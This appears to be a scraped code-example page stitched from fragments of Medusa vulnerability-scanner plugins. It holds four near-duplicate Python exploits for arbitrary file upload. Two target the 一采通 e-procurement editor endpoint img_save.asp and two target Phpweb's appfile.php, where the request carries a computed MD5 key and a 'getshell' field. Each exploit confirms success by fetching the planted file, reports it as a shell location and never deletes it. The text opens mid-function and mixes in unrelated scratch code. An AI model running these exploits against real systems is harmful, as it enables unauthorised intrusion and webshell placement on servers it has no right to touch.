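        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log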
Exemplo n.º 14
#
#     except:
#         pass
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# if __name__ == '__main__':
#     UrlList=[]
#     ThredList=[]
#     la=[]
#     with open("6.txt", 'r', encoding='UTF-8') as f:
#         line = f.readline()
#         while line:
#             ThredList.append(threading.Thread(target=medusa, args=(line.strip("\r\n",),"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",),kwargs={"Uid":"Ayanami Rei","Sid":"Soryu Asuka Langley"}))
#             line = f.readline()
#     for t in ThredList:  # 开启列表中的多线程
#         t.start()
#     for p in ThredList:  # 开启列表中的多线程
#         p.join()
# medusa("","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36")
#celery -A Web.Workbench.Tasks worker --loglevel=info --pool=solo
#python3 manage.py runserver 0.0.0.0:9999
#mitmdump -s ProxyServer.py --proxyauth any --listen-host "0.0.0.0" --listen-port 9747
#.\redis-server.exe redis.windows.conf
# git commit -m  "v0.82.3:palm_tree:"
#find . -type d -name '__pycache__' | xargs rm -rf

import ClassCongregation
# Scratch loop: asks the project's randoms helper for result(10) on each of the
# 99,999 iterations of range(1, 100000) and prints every value it returns.
for i in range(1, 100000):
    a = ClassCongregation.randoms().result(10)
    print(a)
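def medusa(**kwargs) -> None:
    """Check a target's ``img_save.asp`` editor endpoint for unrestricted file upload.

    POSTs a multipart-style body whose ``img_src`` part is a file named
    ``123.cer`` containing a random marker. If the response names a stored
    ``<digits>.cer`` file, that file is fetched from
    ``/library/editornew/Editor/NewImage/``; a 200 whose lower-cased body
    contains the marker is recorded as a finding.

    Keyword Args:
        Url: base URL of the target; the payload paths are appended to it.
        Headers: request headers; ``Content-Type`` and ``Accept`` are set on
            this dict.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the uploaded file afterwards.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = url + payload
        data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert

{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"

提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"

baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"

45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD).encode('utf-8')
        # NOTE(review): the body above is laid out as multipart form data, but
        # the Content-Type announced here is urlencoded and names no boundary.
        # Both assignments also write into the dict the caller passed in.
        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers[
            'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        resp = requests.post(payload_url,
                             data=data,
                             headers=Headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        # Capture group 1 is the stored file name the response reports back.
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group(
                1)
            resp2 = requests.get(payload_url2,
                                 headers=Headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # Only the random marker is uploaded; a 200 that serves it back is
            # what counts as a finding.
            # NOTE(review): con2 is lower-cased but RD is not; if the random
            # helper can return upper-case characters this comparison misses.
            # Confirm against randoms().
            if code2 == 200 and con2.lower().find(RD) != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                    url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, resp2, **kwargs).Write()  # pass the response and the scan data
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the
        # plugin name comes from dict.get(); concatenating None would raise
        # inside this handler and hide the original error.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log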
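def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a target's ``img_save.asp`` editor endpoint for unrestricted file upload.

    POSTs a multipart-style body whose ``img_src`` part is a file named
    ``123.cer`` containing a random marker. If the response names a stored
    ``<digits>.cer`` file, that file is fetched from
    ``/library/editornew/Editor/NewImage/``; a 200 whose lower-cased body
    contains the marker is recorded as a finding.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host and port.
        RandomAgent: value used for the ``User-Agent`` header.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the uploaded file afterwards.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # NOTE(review): this str body contains non-ASCII text and is passed to
        # requests without an explicit .encode(); how it is encoded on the wire
        # is left to the HTTP stack. Confirm this is intended.
        data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert

{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"

提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"

baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"

45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD)
        # NOTE(review): the body above is laid out as multipart form data, but
        # the Content-Type announced here is urlencoded and names no boundary.
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        # Capture group 1 is the stored file name the response reports back.
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            # requests.get, not s.get: no session named `s` exists in this
            # function, so the earlier call raised NameError and the check
            # always ended in the error handler without a result.
            resp2 = requests.get(payload_url2,
                                 headers=headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # Only the random marker is uploaded; a 200 that serves it back is
            # what counts as a finding.
            # NOTE(review): con2 is lower-cased but RD is not; if the random
            # helper can return upper-case characters this comparison misses.
            # Confirm against randoms().
            if code2 == 200 and con2.lower().find(RD) != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                    url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, **kwargs).Write()  # pass the url and the scan data
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # error log receives the URL and the failing plugin's name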
Exemplo n.º 17
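def medusa(**kwargs) -> None:
    """Check a Phpweb target for the front-end file upload issue.

    Three requests are made: a POST of ``act=appcode`` to ``/base/post.php``
    to read the ``k`` value, a multipart POST to ``/base/appfile.php`` that
    submits ``<random>.txt`` with the random value as content and
    ``md5(k + "1")`` in field ``m``, and a GET of
    ``/effect/source/bg/<random>.txt``. A 200 whose body contains the random
    value is recorded as a finding.

    Keyword Args:
        Url: base URL of the target; the payload paths are appended to it.
        Headers: request headers; copied per request type, so the caller's
            dict is not modified.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the uploaded file afterwards.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload1 = "/base/post.php"
        payload_url1 = url + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = url + payload2
        ran = ClassCongregation.randoms().result(10)
        payload_url3 = url + "/effect/source/bg/{}.txt".format(ran)
        # Two independent copies, so the multipart Content-Type used for the
        # upload request does not leak into the other two requests or into the
        # caller's dict.
        Headers1 = dict(Headers)
        Headers2 = dict(Headers)
        Headers1['Accept'] = '*/*'
        Headers1['Content-Type'] = 'application/x-www-form-urlencoded'

        Headers2['Accept'] = '*/*'
        Headers2[
            'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'

        resp = requests.post(payload_url1,
                             data=dada,
                             proxies=proxies,
                             headers=Headers1,
                             timeout=5,
                             verify=False)
        con = resp.text
        # NOTE(review): when the response does not start with "k=...&" the
        # match is None and .group raises; an ordinary negative result is then
        # reported through the error handler below.
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1)  # extract the value of k
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"

1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"

upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"

10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"

getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        resp2 = requests.post(payload_url2,
                              data=dada2,
                              proxies=proxies,
                              headers=Headers2,
                              timeout=5,
                              verify=False)
        resp3 = requests.get(payload_url3,
                             headers=Headers1,
                             proxies=proxies,
                             timeout=5,
                             verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp3, **kwargs).Write()  # pass the response and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the
        # plugin name comes from dict.get(); concatenating None would raise
        # inside this handler and hide the original error.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log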
Exemplo n.º 18
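def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a Phpweb target for the front-end file upload issue.

    Three requests are made: a POST of ``act=appcode`` to ``/base/post.php``
    to read the ``k`` value, a multipart POST to ``/base/appfile.php`` that
    submits ``<random>.txt`` with the random value as content and
    ``md5(k + "1")`` in field ``m``, and a GET of
    ``/effect/source/bg/<random>.txt``. A 200 whose body contains the random
    value is recorded as a finding.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host and port.
        RandomAgent: value used for the ``User-Agent`` header.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the uploaded file afterwards.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload1 = "/base/post.php"
        payload_url1 = scheme + '://' + url + ':' + str(port) + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = scheme + '://' + url + ':' + str(port) + payload2
        ran = ClassCongregation.randoms().result(10)
        payload_url3 = scheme + '://' + url + ':' + str(
            port) + "/effect/source/bg/{}.txt".format(ran)
        # Header set for the urlencoded POST and the final GET.
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        # Header set for the multipart upload request.
        headers2 = {
            'Accept-Encoding':
            'gzip, deflate',
            'Accept':
            '*/*',
            'Accept-Language':
            'en',
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE',
        }
        resp = requests.post(payload_url1,
                             data=dada,
                             proxies=proxies,
                             headers=headers,
                             timeout=5,
                             verify=False)
        con = resp.text
        # NOTE(review): when the response does not start with "k=...&" the
        # match is None and .group raises; an ordinary negative result is then
        # reported through the error handler below.
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1)  # extract the value of k
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"

1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"

upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"

10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"

getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        resp2 = requests.post(payload_url2,
                              data=dada2,
                              proxies=proxies,
                              headers=headers2,
                              timeout=5,
                              verify=False)
        resp3 = requests.get(payload_url3,
                             headers=headers,
                             proxies=proxies,
                             timeout=5,
                             verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and
        # may be None, and concatenating None would raise inside this handler.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log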